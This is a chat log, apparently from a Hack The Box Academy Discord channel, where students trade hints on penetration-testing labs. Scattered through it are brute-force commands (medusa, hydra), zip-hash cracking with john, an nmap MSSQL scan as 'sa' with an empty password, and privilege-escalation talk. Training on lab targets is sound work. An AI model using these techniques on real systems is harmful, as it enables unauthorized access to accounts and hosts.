#modules

1 messages ยท Page 153 of 1

sudden wigeon
#

Thank you!! somehow there were 5 openvpns running. I killed them, it's worth noting that when I start openvpn again with sudo openvpn academy-regular.ovpn and then ps aux | grep openvpn it shows two processes. I imagine this is standard for sudo and not an issue but I am not sure.

My scans now receive all filtered (no response), except 166 filtered (host-unreach), which is a positive, at least recieving packets now. Is this now in the scope of the module and me just needing to mess with scan types or am I still having a network issue?

gray merlin
sudden wigeon
#

I tried that last night but I will try again now

gray merlin
buoyant void
#

Well that was a far quicker task once I didnt try to rush through things and just enumerate it first.... for future reference is there a general rule for which ports are quickest for brute forcing?

sudden wigeon
# gray merlin Make sure you are downloading new vpn files and removing old ones.

So the default filepath for the vpn file download in my VM looks VERY similar to filepath I actually run openvpn from in a shared drive... I had been deleting and replacing a vpn I wasn't even using, and only realised now when I rm'd it and saw it still in the file browser whilst downloading a new one. I feel like SUCH an idiot... thanks so much for your help, so many hours wasted. it's all working now sadglas

gray merlin
low sequoia
#

I need help!

low sequoia
#

Lool, my account is saying it needs compliance verification

fathom pendant
#

ok and?

low sequoia
#

I'm not sure what that means I was just trying to sign up

fathom pendant
#

is it a student account?

low sequoia
#

Regular

fathom pendant
#

i.e. student email

low sequoia
#

nope, used my gmail

fathom pendant
#

then check your email

#

or message support

#

on the website

#

us random assholes in the discord can't really help you

onyx rapids
#

You ever finish the assessment? I could use a nudge in the right direction if you have

novel matrix
low sequoia
#

Thank you guys!!

ebon jasper
#

Hi everyone !
I really need help with tcpdump!
We can see according to module command "sudo tcpdump -i eth0 dest net 172.16.146.0/24" should capture everything related that network
I tried to test it
My network (after ip addr command) IP is 192.168.0.107/24
however when I tried to use command "sudo tcpdump -i wlan1 dest net 192.168.0.107/24" I got this error
tcpdump: can't parse filter expression: syntax error

I searched a lot from google I found this command:
"sudo tcpdump -i wlan1 src net 192.168.0.0/24"

#

and that command captured everything I tested it, but why?

#

My ip is 192.168.0.107/24 however tcpdump capturing if i set it 192.168.0.0./24?

#

dest net command which is showed in that module is not working instead src net command worked

shy trench
#

TY for the Australian pwnbox. 10/10 improvement.

ebon minnow
#

on the resued passwords machine as sam

#

cant seem to externally crack mysql with hydra or get through with the top mysql passwords

#

nvm, solved it

true mauve
#

Heli

#

My hachke ar pels solob my cons4n anad ils

buoyant void
#

Looks like you're on the right track, just checking my notes I dont see anything that stands out as wrong from your options... I used a different LPORT but I can't recall if I did that for some specific reason or just because I wanted to try a different port..

timber basin
#

is there a section for questions for sherlocks?

limber wasp
#

thats my last question, on the whole dang section. smh

buoyant void
#

You're not wrong about the exploit you were using, although I'm sure there might be multiple attack vectors but that .rb file is definitely what the question was pointing too. I'm not an expert but the options looked like the ones I used so I'm not too sure why it's not working. Maybe something to do with the moving of the .rb file into your metasploit module directory? Maybe try deleting it, and moving it into your metasploit directory again. I'm just spitballing here though

limber wasp
#

thanks, that made the 4th time i tried that. I'll see another post of another way to do it, and then try it. To no avail.

buoyant void
#

Sorry I couldn't be of more help bro, that question took me way too long too because I overlooked the vhost name for like 3 hours before I realized what I was doing lol

limber wasp
#

Thanks. it's something super simple i'm sure. I'll get it eventually thanks for the input.

buoyant void
#

Im curious though if you ever figure out what exactly the problem was with using that exploit, it should work. What was that error again? some sort of json error right?

limber wasp
#

Unexpected json response. looking at the exploit down at the bottom is where it does this. I'm thinking its something to do with the exchange of the CSRF token. maybe?

buoyant void
#

That's my initial thought as well. which is a bit outside my already limited knoweldge field lol.. you using the pwnbox or connecting through VPN?

limber wasp
#

VPN

#

i think i'm about to give the pawnbox a shot.

#

I don't ever use it, do u?

buoyant void
#

yeah honestly sometimes I have to try switching from UDP to TCP on the VPN to make something work its pretty frustrating.

Only very rarely, the pwnbox annoys me the latency can be a bit much sometimes and just adds more frustration to situations where you might already be pulling your hair out trying to figure something out

#

I'm guessing you've already tried resetting the target?

limber wasp
#

maybe the rdp'ing into a vhost through a vpn might be having a hard time.

#

lol

#

yep

buoyant void
#

Maybe but I cant imagine how annoying thats gonna be on the pwnbox lol

limber wasp
#

right, thats same reason I dont mess with it.

buoyant void
#

well I'm stumped, give the pwnbox a go see if that helps. Based on the ruby script it looks like the script is expecting some sort of json content from the HTTP response and if its missing that or missing the key path it fails with that error. I have no idea how to remedy that issue though

limber wasp
#

thats whts up. thanks. when i figure it out ill let u know

buoyant void
#

It'll be frustrating if it works on pwnbox, cause now I really want to know why its not working for you lol

fathom pendant
covert citrus
#

If you have completed the Malware Analysis module I could use some hints on the 4th question of the skills assessment section. That is all I have left to complete the module.

covert citrus
#

Never

#

Mind I solved it

wheat scroll
#

I try to settle my ZAP for 1 hours and i failed. Can you, if you have time, send me like a video which show how to settle a ZAP.

umbral fulcrum
#

hey guys, I have a Q regards a LD_PRELOAD Privilege Escalation

when I did it from the ||/home/htb-student ||it gave me|| mrb3n user||, but when I did it from the ||/tmp ||it gave me ||root ||
meaning the only difference is the location of the root.so

didn't managed to understand Y, someone knows??

lethal shard
thorn urchin
#

<@&861185840277487616>

wild iron
#

Could someone help for IntroductionTo windows COMMAND line: I am at Skill assement question 4 and I hard stuck and clueless what to do: I can screenshot for more context but only can send in dm since i am trash at hacking

#

I am unable to acces it: (acces dined)

misty current
#

@wild iron Haven't done the module, so I might be wrong.
Access denied might be intentional. Read the question carefully and try targeting a particular directory.

wild iron
#

Ik it ask for desktop but i still get the same acces dined

#

arf

#

unsure if thats even progress

hallow kiln
#

can you navigate to the Desktop directory or is that access denied too?

misty current
#

I don't think * wildcard does recursion in this case

#

Give Desktop directory fullpath and try?

terse stream
#

I have question related to Firewall Evasion hard lab. As I could able to solve the lab using HTB in browser vm, but when I was trying to solve it using my VM my netcat couldn't accept --source-port option ....I try to update the version of netcat available in my VM but still it not working ,,, does any one know any solution about it.

gray merlin
undone narwhal
# umbral fulcrum ?

Changing the path of the library does not make any difference in obtaining a root shell.

autumn pilot
#

no spoilers please

#

it asks you for the byte that was missing

undone narwhal
marble raft
#

Oh thanks @autumn pilot , apologies for the spoiler, i sincerely thought that the content order was wrong even tho it was triggering. It would be best if the question was stated more clearly

#

i'm going to drop a suggestion on erratum, but awesome module so far. learned tons. Thanks again

umbral fulcrum
umbral fulcrum
acoustic owl
mystic trench
#

I am having trouble with the Pillaging Windows Priv Esc. I am having trouble with the 4 question can't figure out the credentials for the jeff. I restore the Jeff's Documents via restic but I only see his email and M. So I can not login and finish the 4 question. Can somebody point me to the right direction. Please

umbral fulcrum
acoustic owl
undone narwhal
mystic trench
#

I also restored the windows one, but it is empty

undone narwhal
mystic trench
mystic trench
undone narwhal
mystic trench
undone narwhal
#

no, you will get it when you restore a correct snapshot from ||E:\restic||

mystic trench
#

I can't restore it E:\restic it is asking me for the pass

mystic trench
umbral fulcrum
umbral fulcrum
undone narwhal
#

i thought you were doing the last question when you said restoring

#

so, which user access do you have now?

mystic trench
mystic trench
undone narwhal
mystic trench
undone narwhal
#

firefox part

#

i mean start from here
Abusing Cookies to Get Access to IM Clients

mystic trench
undone narwhal
mystic trench
#

Well clearly no

#

I need to go through it again

fierce cave
#

has anyone completed [Shells & Payloads] [Live engagement] host 3 exploitation using the server upload capabilities? am i wrong or aspx reverse shell mechanism only grants inetsrv privileges

undone narwhal
# umbral fulcrum

you dont need restart at the end.
and i dont understand why you are getting a different user shell
strange!

undone narwhal
fierce cave
undone narwhal
mystic trench
fierce cave
mystic trench
#

๐Ÿ‘

undone narwhal
umbral fulcrum
#

did some manage to do the "Library Path" in "Linux Privilege Escalation" ==>> "Python Library Hijacking" ???

mint solstice
#

AD enumeration & attacks - skills assessment part 2 question 1. Someone is available to help me?

umbral fulcrum
#

do anybody understand how to use the /bin/ncdu ?

thorn urchin
#

read the documentation

placid quest
#

@umbral fulcrum write it same the but change it /bin/ncdu cd /root

gaunt rock
#

Hello, about the Introduction to Assembly Language module.

I finished the last section but using a shellcode from msfvenom because I couldn't optimize my code enough to reach 50 bytes (I got stuck at 63) I removed all the null bytes but that was not not enough.

Can anyone give me advice in PM to successfully optimize the code given by the exercise?

tranquil axle
#

You can send me what you have and I can compare it to what I did

umbral fulcrum
placid quest
#

@umbral fulcrum yes

umbral fulcrum
placid quest
#

Let me see

mint solstice
#

AD enumeration & attacks - skills assessment part 2 question 1. How do i get hash? Responder gives nothing

umbral fulcrum
umbral fulcrum
placid quest
#

@umbral fulcrum no worries

pastel lava
#

im a little confused on the advance file disclosure section for the web attacks module my xxe payload is working because i can read /etc/hosts however i try to read /flag.php and it says not found so i assume its not the right directory question is how do i find the right directory im going to check source code in a second that idea popped into my head typing this lol

mint solstice
waxen steppe
#

can I ask for help in here?

undone narwhal
# mint solstice Yes

are you getting any message like skipping if yes look at the log folder for the hash

waxen steppe
mint solstice
undone narwhal
mint solstice
#

From the attack machine (parrot)

undone narwhal
undone narwhal
#

then it will work make sure you are setting the right interface

mint solstice
undone narwhal
mint solstice
opal dagger
#

hello there, some one can help me understand the RDP and SOCKS Tunneling with SocksOverRDP assetsment in the Pivoting module, for what i understand to use SocksOverRDP how is show in the module you need 2 windows machines, 1 for the dll and this will be the machine where we will send the rdp request to the rest and a second machine to run the SocksOverRDP-Server.exe and this machine should have access to the final target network, the question only gives me the ip for the first machine and now im using ping sweep and other techniques to find the second one, at this point i found a couple windows machines that are visible but when i try to rdp with the provided credentials it fails, i just want to know if im on the rigth track or just getting out of the scope of this exercise.

fathom pendant
#

You go a->b->c

#

3 sets of creds, initial-middle-final

opal dagger
#

the question only provides 2 so i imagine the extra one you mention is the one in the module explanation

fathom pendant
#

Yep it's in the section

opal dagger
#

thanks, i was about to start credential dumping on windows

fathom pendant
#

I mean you probably could do that via ntds.dit

opal dagger
#

got it, thanks i will take a look to simulate the full situation ๐Ÿ‘

gray chasm
#

Does anyone know how to do this? ---> Configure SELinux to prevent a user from accessing a specific file.

#

From the Linux fundamentals module -----> Network configuration

fathom pendant
gray chasm
#

They tell you about what seLinux is, but I didn't see any explanations of those exercises, they are alternatives to do

fathom pendant
#

Optional exercises?

gray chasm
#

Yes

#

Put it in the section

fathom pendant
#

You're better off Googling

gray chasm
fathom pendant
#

Optional exercises are not gonna be entirely intuitive and can often lead to more headache for something you're likely not gonna need

gray chasm
#

The truth is that it is complicated and long, since they ask you to configure several things with seLinux and AppArmor.

rare swan
#

Module: Active Directory Section:Attacking Domain Trusts - Child -> Parent Trusts - from Linux -----> still stuck on the question how to get bross ntlm hash... Anyone can push me in the right direction

next bronze
fathom pendant
#

Someone's probably done it

thorn urchin
#

I did some optional stuff but some of them just seemed too tedious to me

#

I like the optional stuff thats like "get into this extra lab machine" or "dont use provided creds and get a shell a different way"

rare swan
#

To get bross hash do i have to get a windows system shell or can i do it all from linux box --- confused

#

Tried dumping ntlm hashes with mimkatz but with no success --> cant acess lsa process

#

Maybe any hint wich tool to use?

next bronze
rare swan
#

actuall dont think so that all tools explained in this section - got system shell but now what

thorn urchin
#

I mean youve said mimikatz but what else have you tried

#

theres like a half dozen tools you can use

autumn pilot
#

don't approach exercises with the copy-paste mentality

#

build your thought process while going through them

thorn urchin
rare swan
#

tools from impacket you mean?

thorn urchin
#

If you havnt tried them thatd be a good place to start

#

Im a big fan of impacket and theyre usually my first go to when appropriate

manic wolf
#

Having some sort of problem with the Protected Archives section of the Password Attacks module. So I used || zip2john Notes.zip > zip.hash and john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash, but john just doesn't do anything, it just tells me "session complete"||

runic harbor
#

stuck on Web enumeration question on the path to pentester path the hint says everything is on the module, ||however, after reaching the admin login page, the module shows that the password is in the source file of the page, but it's not on the target provided page|| im missing something? should i go back on modules for possible solutions?

im dumb

thorn urchin
manic wolf
thorn urchin
#

Your password wasnt in the list

manic wolf
#

I used rockyou, unlike the pic

#

Did it really go that fast through rockyou?

#

Because it happened almost instantly

thorn urchin
#

zip hashes arent very strong

#

usually

#

and rockyou is actually a pretty small wordlist when it comes to offline cracking

manic wolf
#

I guess I'll try the mutated password list I made from the provided password list

#

Thank you!

thorn urchin
#

generally for the module you should be using in the following order: discovered password lists on the host -> mutated list -> rockyou

#

idr if that section had a pass list on the host somewhere but some sections do so make sure you didnt skip out on enuming the system too

manic wolf
#

Thanks a bunch!

thorn urchin
#

np gl

umbral fulcrum
#

Hey guys I'm stuck on "Linux Local Privilege Escalation - Skills Assessment"
flag5, I can't make an interactive shell || stty raw -echo;fg || it keep getting stuck...

someone have any tips please

NM solved...

jaunty loom
#

I've downloaded the Hack the Box Parrot linux image from Parrot website but it doesn't contain some of the tools/files that are supposedly in the Pwnboxes... for example the ffuf tool is supposedly installed (according to the instructions here https://academy.hackthebox.com/module/54/section/485 ) but in the linux image downloaded from Parrot it isnt. same for the SecList repo, it doesnt exists in /opt/useful ... (that folder doesnt exists actually).
I was under the impression that the htb image from parrot contains everything like the Pwnbox.

Anyway just something I thought to point out, maybe it wasnt the intention (that the Parrot htb image is the same as the Pwnbox) ?

halcyon pier
#

Good day, Are there any good HTB modules on AV evasion?

wheat orbit
#

Terimakasih

fading oracle
#

is there anyone here who can help?

#

@next bronze can i dm?

obtuse verge
#

hi!! Can anyone access the machine for 'Windows Server' from the Windows PrivEsc Module? Cant connect to the machine...

fathom pendant
acoustic owl
thorn urchin
#

Theres been rumors of one coming, but nothing yet

fading oracle
#

i really recommend to update the citrix breakout module

#

it is the worse for me yet

cedar void
#

I am having trouble with the Attacking email services section and I am having trouble determining the password. I got the usernname , but not the password.

"https://academy.hackthebox.com/module/116/section/1173"

"Access the email account using the user credentials that you discovered and submit the flag in the email as your answer. "

I am trying to use the evolution tool now (since hydra and the other tools suggested in the module didn't work) and I am not sure how to use the evolution tool to brute force the password.

I google 'evolution brute force password' and couldn't find anything.

fathom pendant
#

That's all evolution is

#

You can connect via any of the methods mentioned in the section

fading oracle
#

i ma in citrix breakout module

#

why this is doesnt work?

thorn urchin
#

well for setup.msi at least you need to reference the path

#

.\

#

Not sure why your powerup doesnt find that command, could be a no good version of Powerup

fading oracle
#

the setup.msi i typod

#

buit when i access it from paint

#

the PowerUp is from the attack box

#

so idk

#

what should i do know?

cedar void
fading oracle
#

@thorn urchini sent a dm

thorn urchin
#

I havnt done the section, added after I finished the course.

#

I can only speculate based on what I saw you post

fading oracle
#

i am starting to feel like an idiot

#

first the attack box had a changed keyboard didnt had "_" for example

#

did not expect copy paste

#

than smb fucked up

#

than this

#

i cant continue without PowerUp

fathom pendant
#

If that's what you're referring to when connecting

#

All that section is having you do is literally authenticate using known credentials

cedar void
fathom pendant
#

Or you should have it from a previous section

#

Yeah it says "user credentials you found" so should already have it

cedar void
soft plume
#

I'm currently on the on the MSSQL learning and the command sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 (IP) is currently giving me an ERROR that the script execution failed for all of the ms-sql-*, am I missing something obvious any hints would help!

fathom pendant
#

Take out the @inlanefreight in your hydra command

fathom pendant
soft plume
#

ohh ok

#

that makes sense then, I thought we were supposed to use the basic creds that was inthe commadn thank you!

pale bone
#

I have subscriptions in lab platform can I join with this VIP+ subscriotion to htb academey or they are different?

fathom pendant
#

They are different

#

You can probably search in:modules VIP+ and you can find a bunch of people ask the same thing

tulip dragon
#

can't login wiht david creds in smb

#

Passwords attacks lab hard

fathom pendant
#

Are you sure you're copying the password correctly?

tulip dragon
#

aha

fathom pendant
#

That was it, wasn't it

tulip dragon
#

nah

#

still getting error

#

either passoword cracked is wrong

alpine drum
#

Hello. I am having problems with the Footprinting NFS module. I am following the instructions and I try and mount my target-NFS folder, but I get the following error 'bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.'. Where do I find the helper program ?

#

On googling this, I think I need the nfs-utils package (or equivalent). What command do I need to run on parrot to get this ? Apologies for asking such a basic question, but I am a little bit new to this

heavy marsh
#

Is there a more reasonable way to do the "Attacking Common Services" FTP module?

I'm using the command: medusa -U users.list -P pws.list -h <ip> -M ftp -n 2121 -t 128

It's taking a long time and I'm using the resources from the module.

#

Also, it seems like medusa ran the first username with every possible password in serial, and then after that was complete is running every username with each password in parallel. Is that normal behavior? I hope the serial/parallel analogy makes sense.

fiery berry
tidal kelp
#

Currently doing Module: Web Attacks , Section : Mass IDOR Enumeration.
are you suppose to follow a long with the manual fuzzing of the exercice? Cause when I go to target the uid is not shown (at all) as in in the material

#

it doesn't show either in burp when i capture the traffic either..

fiery berry
earnest zenith
#

How is digital forensics a proactive tool? Isn't it a reactive measure? Module: Introduction to digital forensics

tranquil axle
#

you are not only figuring out what happened but also define how it can be detected faster in the future

jagged zenith
#

Anyone complete module footprinting

wheat orbit
sly goblet
keen compass
#

Hi, on Documentation & Reporting > How to Write Up a Finding > **Optional Exercices : I am trying to write to gather additional evidence for findings but I cannot find any host up within the scope network.
Is this normal ?

rustic sage
#

Hey @obtuse quest , I am having same issue here. Were you able to find a solution to this?

fathom pendant
wanton jasper
#

sys.user$ does not exist

#

Nevermind, for anyone in the future make sure you logged in as sysdba

jaunty loom
#

https://academy.hackthebox.com/module/54/section/511
In question
One of the pages you will identify should say 'You don't have access!'. What is the full page URL?

I literally open the page in a webbrowser and i see You don't have access!. I copy the address, paste it in the textbox and I get Incorrect Answer... whats the trick (bug)? (the hint doesn't help it suggests doing what i did)

prime rune
#

Hi, not sure I'm in the right place to ask this questions, but I have interest to learn a wireless/network testing/cracking, need your recommendations what module should I start first?

fathom pendant
#

I think there's a Wireshark module

#

There's not too many wireless courses in htb

#

As these are focused on in-network/physical

manic wolf
prime rune
#

Thank you ! will have a look on it. Appreciated it

grizzled schooner
#

"Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})"

|| I have gained access to the IMAP server however, the only inbox that I found that contained anything was DEV.DEPARTMENT.INT which contained the admin email, but no flag. Am I missing something||

ionic heron
grizzled schooner
#

No, the module didn't talk about that really... If I'm connected to imaps, how would one go about doing that? Do I need to use ||p143 instead of 993?||

ionic heron
#

The different port? I'd have to check... maybe someone else here remembers. ๐Ÿ™‚

ionic heron
silver comet
#

no general in this server?

jaunty loom
jaunty loom
# next bronze look at the hint

i did its the first thing i do before asking here
the url i got is wrong? i mean it does show the message in the question...if there are multiple pages with this message that i need to find then the question is written in a confusing manner

next bronze
#

the url is correct, you did you replace the port?

jaunty loom
#

yes the url i pasted here is exactly what i put in the answer
and its the url that i open in the browser to see the message

next bronze
jaunty loom
#

ohhhhh ok lets see if use the word PORT instead of the number

next bronze
#

yep, should remove the url now since it's the answer

jaunty loom
#

how hard can it be to add a regex that will accept just any number after the : when it checks the answer

#

anyway thank you very much @next bronze

#

the hint confused me cause it shows an example with the word PORT and in the hint it tells you to "use" PORT and my brain took it for REPLACE PORT braindamage

mortal basin
#

๐Ÿ”ฅ

#

That makes 14/15 ๐ŸŒš๐Ÿ”ฅ

fathom pendant
ionic heron
misty current
#

I'm assuming one thing and I'm really excited about my assumption lol.

acoustic owl
jaunty loom
#

if i get this right, with the monthly subscription we dont get access to the modules, just a monthly supply of cubes and unlimited pwnbox time, correct? we get access to the modules only with yearly subscription?

acoustic owl
# mortal basin ๐Ÿ”ฅ

plus your two JavaScript modules (Secure Coding 101: JavaScript and Whitebox Pentesting 101: Command Injection) are then modules 16 and 17... ๐Ÿ”ฅ๐Ÿคฉ

slender shoal
#

21y4d has all of the paths ๐Ÿ˜„

next bronze
jaunty loom
misty current
#

I got all the Whitebox Pentesting related modules early today. I'd be damned if a subscription model to minimize the pricing for Tier3+ is later introduced lmao.

next bronze
acoustic owl
hallow kiln
jaunty loom
#

i am considering the academy paths/modules vs the htb vip subscription (machines)
i understand it's technically better to start with the academy as things are (probably?) arent thought as deeply in HTB but maybe they are?

hallow kiln
next bronze
#

wonder how much that would cost ๐Ÿ˜ณ

hallow kiln
misty current
next bronze
acoustic owl
hallow kiln
misty current
mint solstice
#

AD enumeration & attacks - skills assessment part 2 question 7. I have administrator access to sq01, run mimikatz, lazagne and the administrator hash what I get is not good to ms01. What I am missing? How should I get access to ms01?

thorn urchin
#

What other hashes did you possibly get

acoustic owl
mint solstice
thorn urchin
#

Nah from your mimikatz/lazagne stuff

mint solstice
acoustic owl
#

I fear the year 2024 will not be boring

misty current
#

Seems like it won't be hugthebox

mint solstice
grizzled schooner
ornate rivet
#

Hi everyone,
I am working on the ''Introduction To C#'' module and have been stuck on a particular exercise for a few days now. It's the following one: ''Import the Library-Question library appropriate for your OS and dotNet version, using the HTBLibrary namespace. What is the output of the Flag.GetFlag() method from the library?''
I am working with Visual Studio on my system, so not using any VM. Just VS 2022 on my Windows PC. Reason I find this exercise hard is that I have no idea how to properly handle the .dll file that comes with the exercise. I have tried a bunch of things but none seem tow work. I believe I do know what it is that I have to do (roughly) but I lack the understanding/know-how to actually make any progress. I'd appreciate it a lot of anyone could help me out. Thanks in advance:)

fathom pendant
#

1 fetch 1 body[] should work

#

I linked an article a while back about imap commands

grizzled schooner
#

Alright, lemme give that a try I used || 1 FETCH 1 BODY.PEEK[HEADER.FIELDS (FROM EXISTS)] || but maybe I used something wrong there

fathom pendant
#

Don't do .peek

#

Also you're only grabbing the header not the full email

grizzled schooner
#

yeah that'll do it, user error, got that thanks
and probably stupid question, but the last question I have is finding FQDN... I assume I'm overlooking it, but I don't see it anywhere... any hints?

edit: machine restart fixed that problem

carmine hill
sly kelp
carmine hill
#

The hardest web certification ever in the world

#

We should better get used to ctf and web challenges to start getting familiar reading source code to spot vulnerabilities

sly kelp
#

Those who fail will go to jail

#

Well it made me more excited than my engagement ๐Ÿ˜‚๐Ÿ˜„๐Ÿ˜‚

obtuse verge
#

Hi all, I am having some difficulty with the HTB Academy Hard Footprinting Lab. I saw SNmP protocol in the UDP scan, but cant use the tools that the module presents... Am i doing something wrong?

sly kelp
thorn urchin
acoustic owl
#

maybe we can buy the exam vouchers as a subscription kek

#

But hey, challenge accepted ๐Ÿ˜

mint solstice
#

AD enumeration & attacks - skills assessment part 2 question 7. I have administrator access to sq01, run mimikatz, lazagne. The administrator hash what I get is not good to ms01. What I am missing? How should I get access to ms01?

thorn urchin
#

Look over the other results you get from those dumps

mint solstice
craggy steppe
#

Hey !
i'm doing the sqli assessment and and i only get white pages..
i'm pretty sure my shell.php is good but nothing happens..

fathom pendant
#

If your shell is calling back to your ip you'll need to have a listener on the attack host, otherwise you need to do the ?c=insert_command_here

craggy steppe
#

i'm using the second method and nothing happens,
the website gives me a 200 code and nothing else just a big white screen burning my eyes

whole blade
#

Hello guys. Anyone doing the "litter" Sherlock challenge?

#

I found already the communication happening between the compromised host and the C&C. My problem is trying to decode the contact (trying not to give spoilers here). I can see part of the commands but not all

whole blade
#

ok, thanks, first time here

acoustic owl
#

No problem ๐Ÿ™‚
If you have no access, read and follow #welcome

acoustic owl
whole blade
#

Yes, already using it

craggy steppe
obtuse verge
#

i got it thank you!

thorn urchin
#

np

mint solstice
thorn urchin
#

DM me your full mimikatz output

gray merlin
#

<@&861185840277487616>

livid zephyr
#

Module: SQL injection fundamentals, section: Using Comments. I got the 'Login successful as user:admin" message, but not flag. Why?

wild iron
#

I am still stuck at the same thing: skill assesment from: introduction to windows command. Here my issue I am unable to answer the question I have tried countless different command It always get acces dined or nothing

#

is it mssing on purpose the password ?

#

also ls / tree doesnt work

#

am i supposed to do in a different way maybe ? root escalation ?

eager loom
#

Im having trouble on the linux fundementals.
The question is: What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
My answer is sudo find / -type f -name *.conf -newermt 2020-03-03 -size +25k -size -28k -exec ls -al {} ; giving the result of:

#

why cant i upload a photo?

#

either way these are the only 2 results

#

-rw-r--r-- 1 root root 27381 Apr 3 2021 /etc/dnsmasq.conf
find: โ€˜/home/htb-ac-1012663/.cache/docโ€™: Permission denied

#

so i put dnsmasq.conf as the answer as that is the only one that shows

#

but it shows up as wrong?

#

idk what im doing wrong

wild iron
#

which content is that

#

ik its linux fundementals

#

but which section

#

@eager loom

#

It can help, he does explain nicely

eager loom
#

Thank you i will have a look its 3am for me though so i will do tommorow i give up for now.

wild iron
#

no dramas

#

@real delta

pine apex
#

I know this is basic stuff, but I'm so proud of me for getting through that last tcpdump section ๐Ÿ˜… It was stinky as hell for my brain! I def need more practice!

wild iron
#

I've been there, that module is actually fun tho

pine apex
wild iron
#

If you want hands on practice with wireshark, go check the labs for sherlock

#

It is so much fun to be a detective ๐Ÿ˜„

#

Uses the same principale tho

#

after that you feel like a real hacker fingerguns

pine apex
#

ahhh I'll make sure to check it out! Thanks bobby!

wild iron
#

๐Ÿซก

pine apex
#

I'm just so happy rn ๐Ÿ˜‚ this is wonderful

wild iron
#

Happy for you, me atm I am having a aneurismkek

pine apex
#

we're gonna make it! I'm sure you'll get it soon!

wild iron
#

Yeayea maybe in few more days sadglas

#

@rustic sage

mild flower
#

Hi guys ๐Ÿ‘‹

#

I have a problem kinda

wild iron
#

Spill it

#

yea ive done that mistake 100 times already

#

but tried with the correct one and doesnt work

mild flower
#

Guys can you give me some advice?

clear hatch
#

Module: Windows Privilege Escalation
Section: Skill Assessment 1
Problem: Find the password for ldapadmin account somewhere on the system.

My Question:
I used all the credential hunting techniques and plugged ldap admin into find.
Can someone give me a nudge?

#

@wild iron why arent you using backslashes?

hallow kiln
wild iron
clear hatch
# wild iron doesnt change much

then try to specify the full path ... youre starting with '/' which is the beginning to a linux path.... you should probably start by using C:\

wild iron
#

tried it already

mild flower
#

I got tricked I knew one girl then we chatted and we had meetings and she was trustworthy and she had one task riddle and if someone would guess that was the winner and we were getting the price and she texted me that I needed confirmation letter for the company from insta and I thought it was something new so I said I didn't know that so she said add my mail in insta and give me access with it I'll do it and I said okay then I got hacked

clear hatch
#

bruh XD

wild iron
mild flower
#

So I didn't know my bank account number and I gave her my ID what a dumb me and ://///

wild iron
mild flower
#

I'm gonna call the police

#

Now there's a thing

gray merlin
#

@mild flower - Unless you can somehow tie this in with the HTB modules. This is not the right place.

mild flower
#

He tried to hack my fb but I had 2 steps on it so I brought back my fb

wild iron
#

havent you got is IP ?

#

was he using a vpn / dns /proxy ?

mild flower
#

And I know where he came in my acc and he was using iphone 6

gray merlin
#

The Password Attacks module is not 8 hours. smh

wild iron
#

xD

gray merlin
#

It feels like it takes for years...

acoustic owl
wild iron
#

dont worry i am at introducing windows command line its says 4 days, i feel like a good 2 weeks

gray merlin
#

dang it.

mild flower
#

I'm only working about my personal ID

#

And I remembered I have this girl in the fb list and I texted her on FB and she told me her IG was hacked and she didn't write a post about it

clear hatch
#

Module: Windows Privilege Escalation
Section: Skill Assessment 1
Problem: Find the password for ldapadmin account somewhere on the system.

My Question:
I used all the credential hunting techniques and plugged ldap admin into find.
Can someone give me a nudge?

mild flower
#

She removed my mail from my account

#

Is this possible to know the current Mail?

acoustic owl
mild flower
#

Sorry://

clear hatch
#

i love being completely ignored

mild flower
clear hatch
#

XD

#

okaaayyeeee

#

not currently accepting friend requests from accounts i dont share a server with. thanks

acoustic owl
clear hatch
clear hatch
#

would this be an issue?
JuicyPotato.exe: PE32+ executable (console) x86-64, for MS Windows

mild flower
#

Guys do you know someone who can help me ?

gray merlin
clear hatch
#

`# systeminfo

<SNIP>
System Type: x64-based PC `

wild iron
acoustic owl
wild iron
clear hatch
clear hatch
mild flower
orchid pine
#

guys in cmnd injection modeule normally we can output a / using the ${HOME:0:1} or pwd or path but on the exercices the **${HOME:0:1} ** wasnt outputing annything just the ping is it because the home varaible wasnt set

wild iron
hallow kiln
clear hatch
#

whats your's?

mild flower
wild iron
hallow kiln
#

Sucks to be you, can't help you

gray merlin
# clear hatch whats your's?

He was just saying that he would have helped you if he could have. Same here. I am not to that section and can't help.

clear hatch
wild iron
#

Yea I told you that it doesnt work buddy, where you getting at ?

#

btw if you verify your acc, you could post snapshot/screenshot to help your situation

#

Or i think add your student id or smt to the discord*

#

from the htb website

#

Go onto Hackthebox --> create an account on academy --> do fundamentals modules / easy module

#

and aslo creat an account on labs

#

and do starting point

#

it helps a lot

#

to get your fundamentals

#

and you will be able to chose the path youu want

vital adder
#

if you friend me just for asking dumb shit like hack fb then kindly Grab a dick and eat it whole

compact patrolBOT
mild flower
#

I downloaded my fb history and can I see his IP address?

#

I know the IP but I'm not sure if it's right

gray merlin
acoustic owl
mild flower
#

Okay thanks

gray merlin
#

Trusting some rando on the internet and getting burned, and then asking other randos for help. ๐Ÿคฏ

wild iron
#

๐Ÿ˜‚

clear hatch
#

@acoustic owl Thanks for the nudge I wasnt aware of the -c flag !

heavy marsh
#

Attacking common services lab I'm getting an error on the last question:

#

Login as the user "jason" via SSH and find the flag.txt file. Submit the contents as your answer.

#

It gives a "permission denied publickey" error

#

Permission denied (publickey).

#

The password is correct from the previous question, so I know that's not the issue.

wild iron
#

deobufiscation ?

fathom pendant
#

you need to enumerate to get the rsa_id

#

that is telling you the accepted auth methods for this service

#

which in this case is the pub_key/id_rsa

wild iron
#

btw as you are here @fathom pendant have you done the module introduction to windows command line?

fathom pendant
#

i don't think so

wild iron
#

fuck

fathom pendant
#

ยฏ_(ใƒ„)_/ยฏ

wild iron
#

im so stuck idk what to do

fathom pendant
#

just ask your question my guy

heavy marsh
wild iron
wild iron
#

stuck question 4

fathom pendant
# wild iron

so each user's password is the user from the previous question's answer

wild iron
#

naaah

#

really ?

fathom pendant
#

and all you gotta do is do dir /a iirc

heavy marsh
fathom pendant
#

it's the same thing

wild iron
fathom pendant
#

it just means it uses a pub/priv key pair @heavy marsh

#

@wild iron are you logged in as that user?

wild iron
heavy marsh
wild iron
#

Oh well thats not it

fathom pendant
#

You need to be that user to see their desktop

#

my guy

wild iron
#

